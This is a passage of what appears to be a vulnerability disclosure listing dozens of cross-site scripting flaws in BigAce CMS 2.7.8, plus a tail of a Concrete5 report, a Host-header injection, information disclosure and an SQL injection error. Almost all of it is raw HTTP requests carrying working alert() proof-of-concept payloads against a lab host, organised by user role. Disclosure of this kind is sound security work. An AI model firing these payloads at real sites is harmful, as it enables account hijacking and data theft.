ccm_token=1376292237%3A47e17cc29a3b0e20cd35e618aebc20d8&SITE='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&ccm-submit-site-form=Save
---< request >---

31. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/tracking_codes/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 190

ccm_token=1376292246%3A18fb91291997356ac1a2f84e7edd3e07&tracking_code='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&tracking_code_position=bottom&ccm-submit-tracking-code-form=Save
---< request >---


32. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/excluded/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 87

SEO_EXCLUDE_WORDS='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&ccm-submit-button=Save
---< request >---

33. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 210

miID=1&miEmail='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&miIsEnabled=0&miServer=asd&miUsername=asd&miPassword=asd&miEncryption=&miPort=asd&miConnectionMethod=POP&ccm-submit-mail-importer-form=Save
---< request >---

Let me know if you have any questions.

Enjoy ;)

[EN] BigAce 2.7.8 Multiple bugs

Last week I saw that in latest version of BigAce CMS Yashar shahinzadeh found a vulnerability.

I decide to check it again, and I found few other things described below.

I. For normal registered ('anonymous') user:


1. Escaping from the source code via Host header:

---< request >---
GET /bigace/public/index.php?cmd=smarty&id=-1_len HTTP/1.1
Host: 1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaaaaaaa%3c%68%31%3e%61%73%64%3c%2f%68%31%3e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=t02veplpq601tanqc9ugm5sas1
Connection: close
---< request >---

Response:
 <link rel="stylesheet" href="http://1"%22%2f%3e%3cimg%2fsrc="x"%2fonerror="alert(2)">aaaaaaaaa
 aaaaa%3c%68%3 1%3e%61%73%64%3c%2f%68%31%3e/bigace/public/cid1/spring_flavour/style.css" type="text


II. For editor user logged-in:

1. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D='>"><script>alert(2)</script>&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D='%3e"%3e<script>alert(2)</script>&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='%3e"%3e%3c<script>...&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

4. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


5. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=

---< request >---

6. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


7. xss

---< request >---

POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

8. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

9. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

10. xss

---< request >---

POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---


11. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=4&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---


12. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=categoryCreate_tADMIN_len&data[parent]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---

13. xss and dom-based xss
---< request >---
GET /bigace/public/index.php?cmd=application&id=-1_timages_len&browserMode=listing&jsFunc='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---

14. xss

---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------60191211818685
Content-Length: 1500

-----------------------------60191211818685
Content-Disposition: form-data; name="mode"

upload
-----------------------------60191211818685
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain

sialala;]
-----------------------------60191211818685
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------60191211818685
Content-Disposition: form-data; name="data[name]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[unique_name]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[description]"


-----------------------------60191211818685
Content-Disposition: form-data; name="data[langid]"

"><script>alert(43)</script><
-----------------------------60191211818685
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------60191211818685--
---< request >---


15. xss + information disclosure

---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode="%20body%20onload%3d"alert(4321)"%3e

---< request >---


Response:

<div id="darkBackground">
<form name="" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len" method="POST">
<a href="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len&mode=" body onload="alert(4321)">"><img src="http://10.149.14.52/bigace/public/system/style/standard/refresh.png" border="0" align="top" alt="RELOAD" /></a> <select name="mode" onChange="this.form.submit()">
<option value="index">Statistics Info</option>
<option value="last7">Last Seven Daily Averages</option>
<option value="os">OS Information</option>
<option value="browser">Browser Information</option>
<option value="bots">Search Engines</option>
<option value="visitors">Top Visitors</option>
<option value="references">Top References</option>
<option value="byYear">By Year</option>
<option value="byUrl">By URL</option>
</select>
&nbsp;&nbsp;<noscript><button type="submit">Show</button></noscript></form>
</div>
<h3 class="error">Requested Mode does not exist: " body onload="alert(4321)"><br>/var/www/bigace/system/admin/plugins/includes/statistics/.php</h3><div align="center" class="CopyrightFooter"><span class="copyright">Powered by <a href="http://www.bigace.de/" target="_blank">BIGACE 2.7.8</a>.&nbsp;All rights reserved. <br />&copy; 2002-2013 <a href="http://www.kevinpapst.de/" target="_blank">Kevin Papst</a><br /></span></div>
<!-- $Id: AdminContentFooter.tpl.html,v 1.2 2009/02/28 00:43:33 kpapst Exp $ -->


16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)

-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

"><script>alert(/x/)</script>
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---


17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---

18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52

-----------------------------7318133896418
Content-Disposition: form-data; name="mode"

upload
-----------------------------7318133896418
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------7318133896418
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------7318133896418
Content-Disposition: form-data; name="data[name]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[unique_name]"

'"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e
-----------------------------7318133896418
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaa
-----------------------------7318133896418
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------7318133896418
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------7318133896418--
---< request >---

19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D=cze%3b]%3c%2fscript%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bcatchwords%5D=asdasd&data%5Bdescription%5D=asdasd
---< request >---

20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=menuAttributes_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=6&data%5Bid%5D=-1&data%5Blangid%5D=en&data%5Bparentid%5D=-9999&data%5Bunique_name%5D=index_en.html&data%5Bname%5D=Home&data%5Bcatchwords%5D=BIGACE+WEB+CMS&data%5Bdescription%5D=Menu+TOP-LEVEL&data%5Btext_4%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0
---< request >---

III. For 'designer' user logged-in:

1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenu_tADMIN_len&data[id]=-1&adminCharset='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data[langid]=en&mode=changeattrib HTTP/1.1
Host: 10.149.14.52
Connection: close
---< request >---


2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=createNewMenu&data%5BnextAdmin%5D=menuAttributes&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=asd&data%5Bcatchwords%5D=asd&data%5Bdescription%5D=asd&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=PublishingWorkflow&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---

3. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=design_tADMIN_len&mode=update&hashtoken=0cbbd0bec2522717655d2458877c750b HTTP/1.1
Host: 10.149.14.52
Content-Length: 214

designName=BIGACE-REDIRECT&description=Redirects+to+the+URL+in+the+Menus+Catchwords.&template=REDIRECT&stylesheet=dummy_stylesheet&portletColumns='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&contents=asd
---< request >---


IV. For admin logged-in:

1. xss
---< request >---
GET /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len&data[id]=-1&data[nextAdmin]='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
---< request >---

Response:

<form name="MenuValues" onSubmit="return checkCreateForm();" action="http://10.149.14.52/bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len" method="POST">
<input type="hidden" name="mode" value="createNewMenu">
<input type="hidden" name="data[nextAdmin]" value="'>"><img/src="x"/onerror="alert(4321)">">


2. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------309932421512500
Content-Length: 1022

-----------------------------309932421512500
Content-Disposition: form-data; name="mode"

upload
-----------------------------309932421512500
Content-Disposition: form-data; name="userfile[]"; filename=""
Content-Type: application/octet-stream


-----------------------------309932421512500
Content-Disposition: form-data; name="data[parentid]"

a"><script>alert(1)</script>
-----------------------------309932421512500
Content-Disposition: form-data; name="data[name]"

aaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[unique_name]"

aaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[description]"

aaaaaaaaaaaaaaaaaaaaaaa
-----------------------------309932421512500
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------309932421512500
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------309932421512500--
---< request >---


3. same request, parameter  data[name] (xss too)

4. same for parameter: data[unique_name], data[description].


for data[description] to reproduce you must exit from <textarea> tag, so
payload should be similar to this one:
</textarea><script>alert(2)</script>

5. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=itemMenuCreate_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=createNewMenu&data%5BnextAdmin%5D=itemMenu&data%5Blangid%5D=en&data%5Bparentid%5D=-1&data%5Bname%5D=aaaaaaaaaaaa&data%5Bcatchwords%5D=aaaaaaaaaaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaa&data%5Btext_4%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Btext_3%5D=displayContent&data%5Bworkflow%5D=&data%5Bnum_3%5D=0&data%5Bcontent%5D=
---< request >---

6. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------47528326907
Content-Length: 1420

-----------------------------47528326907
Content-Disposition: form-data; name="mode"

upload
-----------------------------47528326907
Content-Disposition: form-data; name="userfile[]"; filename="2ASK.txt"
Content-Type: text/plain

sialala;]
-----------------------------47528326907
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------47528326907
Content-Disposition: form-data; name="data[name]"


-----------------------------47528326907
Content-Disposition: form-data; name="data[unique_name]"


-----------------------------47528326907
Content-Disposition: form-data; name="data[description]"


-----------------------------47528326907
Content-Disposition: form-data; name="data[langid]"

"><script>alert(3)</script>
-----------------------------47528326907
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------47528326907--
---< request >---

7. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=fileAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=6&data%5Bid%5D=1&data%5Blangid%5D=en&data%5Bworkflow%5D=&data%5Bname%5D=2ASK.txt&data%5Bunique_name%5D=2ASK.txt&data%5Bmimetype%5D="><script>alert(9)</script>&data%5Bcatchwords%5D=aaaaaaaaaaaaaa&data%5Bdescription%5D=aaaaaaaaaaaaaaaaaaaaaaa
---< request >---

8. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len&mode=addToGroup HTTP/1.1
Host: 10.149.14.52

data%5Bid%5D=3&data%5Bgroup%5D=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e
---< request >---


   
9. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


10. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


11. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---


12. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

13. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1048

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

"><script>alert(234)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---


14. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

15. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcitycode%5D=&data%5Bcountry%5D=
---< request >---

16. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bcountry%5D=
---< request >---

17. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=userAdmin_tADMIN_len HTTP/1.1
Host: 10.149.14.52

mode=updateData&data%5Bid%5D=3&data%5Bfirstname%5D=&data%5Blastname%5D=&data%5Bhomepage%5D=&data%5Bphone%5D=&data%5Bmobile%5D=&data%5Bfax%5D=&data%5Bcompany%5D=&data%5Bstreet%5D=&data%5Bcity%5D=&data%5Bcitycode%5D=&data%5Bcountry%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e
---< request >---


18. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: multipart/form-data; boundary=---------------------------12326531612573
Content-Length: 1039

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

"><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---

19. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1045

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

"><script>alert(3)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

asdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---

20. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=mediaUpload_tADMIN_len HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1053

-----------------------------12326531612573
Content-Disposition: form-data; name="mode"

importFiles
-----------------------------12326531612573
Content-Disposition: form-data; name="importURLs"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[parentid]"

-1
-----------------------------12326531612573
Content-Disposition: form-data; name="data[name]"

asdasdasd
-----------------------------12326531612573
Content-Disposition: form-data; name="namingType"

namingFile
-----------------------------12326531612573
Content-Disposition: form-data; name="data[unique_name]"

asd
-----------------------------12326531612573
Content-Disposition: form-data; name="data[description]"

"></textarea><script>alert(2)</script>
-----------------------------12326531612573
Content-Disposition: form-data; name="data[langid]"

en
-----------------------------12326531612573
Content-Disposition: form-data; name="data[category][]"

-1
-----------------------------12326531612573--
---< request >---

21. SQL Injection

<td valign="top">MySQL error (1064:
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near 'x"/onerror="alert(4321)">'' at
line 1) for [SELECT count(id) as amount FROM cms_item_future WHERE itemtype='1' AND
id='-1' AND cid='1' AND language=''>"><img/src="x"/onerror="alert(4321)">'
       
        ;]
       
22. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52

start='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&amount=10&namespace=&level=
---< request >---

23. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52

start=1560&amount="%20body%20onload%3d"alert(4321)"%3e&namespace=&level=
---< request >---

24. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=community_tADMIN_len HTTP/1.1
Host: 10.149.14.52

s4lv09G4d=j6dbng376&o8F5hJ39y='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&kjhgzt87D=asd
---< request >---

25. xss + info disclo
---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
